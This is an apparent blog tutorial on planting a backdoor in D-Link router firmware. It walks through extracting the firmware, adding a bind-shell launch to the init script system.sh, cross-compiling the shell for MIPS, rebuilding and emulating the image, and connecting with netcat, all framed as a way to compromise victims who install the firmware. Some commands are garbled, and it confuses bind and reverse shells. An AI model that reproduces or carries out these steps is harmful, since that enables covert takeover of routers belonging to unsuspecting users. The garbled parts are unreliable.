What if you install new firmware and end up compromising all your router data & settings? Don’t rub your eyes dude, this is easy. So, it is an IoT (Internet of things) attack that enables the attacker to access the shell of your router by creating a backdoor in the router firmware.

Starting with some pre requisites:

  1. Firmware: The program or set of programs that are pre-installed on a hardware device.
  2. Backdoor: It’s like a secret way to some protected place that even allows the unauthorized people to enter without any verification. Talking in terms of computer security, It is very much similar, it is basically a way that bypasses an authentication mechanism by discovering a new way to enter & gain access to a computer resource.
  3. Bindshell: In order to hack some machines, two types of shells are used. In bindshell, the listener port lies on a victim machine so that attacker can connect using that port.
  4. Attify OS: A Linux based operating system preloaded with all the IoT penetration testing tools.  But if you want to use kali Linux or some other Linux you need to have the following tools in it. Get it here

Buildroot: A bootable Linux environment is emulated using a buildroot as it contains the set of files which are basically known as makefiles (which contains all the tasks that need to be executed) along with the required patches for cross-platform compilation. Get it here

Firmware-mod-kit: Basically a firmware kit used to extract and rebuild the firmware and operations related to them. We will be using the DLink firmware that is available in this kit. Get it here

Firmadyne: Firmadyne is basically a firmware emulation and analysis system which is based on linux. Get it here

AttifyOS comes with all required tools.

Summary

We will be creating a backdoor in the firmware so that whenever a user installs it, He/She ends up compromising the router data. There is one dependency, the Victim is required to download the same firmware.

Steps to be followed to infect a firmware:

  • Go to path: /home/oit/tools/firmware-mod-kit and extract your DLink firmware at this location using
Extracting a file in linux
 ./extract-firmware dlink_firmware.bin 
  • After successful extraction, Browse into the root file system. To do so go to /home/oit/tools/firm ware-mod-kit/Dlink_firmware/rootfs using
 cd Dlink_firmware/rootfs/ 
  • You are required to go into etc directory, to do so. First of all, type ‘ls’ for confirmation of right directory and then.
 cd ./etc  

Remember the ’.’ denotes the etc of this firmware not root file system.

Init.d: The subdirectory in the etc directory which have all the start/stop scripts used to initialize the processes.

  • Go to init.d by typing cd init.d
cd ./etc/init.d
  • You need to write ls command with la parameter
how to create a backdoor in firmware
ls -la
  • It contains the path of files needed for initialization. Open system.sh using any text editor, we used nano. Go to etc/script/system.sh and type
sudo nano system.sh
  • After any one of the /etc/ line echo some text, insert your bindshell with an echo command for output.
Hacking a router firmware
echo “Anything as output”
/etc/templates/Bindshell.
  • Bindshell program is Below. Run sudo nano abcd.c. It gives the netcat reverse shell.
  • The C program needs to be compiled using a MIPS architecture’s compiler:
cd tools//binroot-2015.11.1/output/host/usr/bin.
We choose : mipsel-buildroot-linux-uclibc-gcc

Copy  that c program in this folder. and now start compiling the file here.

compile a code using gcc compiler
./mipsel-buildroot-linux-uclibc-gcc abcd.c-static -o Bindshell
  •  Copy the Bindshell you compiled to /etc/templates/ directory.
OWASP TOP10 IOT ATTACKS
  •  Build the firmware, Go to firmware-mod-kit directory.
Hacking a firmware of a router
 ./build-fimrware.sh Dlink_firmware/

Find the file in the Dlink_firmware Directory as “new-fimrware.bin”.

  •  Copy the .bin file to firmadyne directory and now run ./fat.py
Hack a router firmware using Atify OS
Hacking a file system in Kali llinux
  •  Open a new tab in terminal and type
nc <ip_address> <port_no>
Complete tutorial for Firmware hacking using a backdoor

Mission Shell Access Successfull!!

How do email transfer take place? Find out here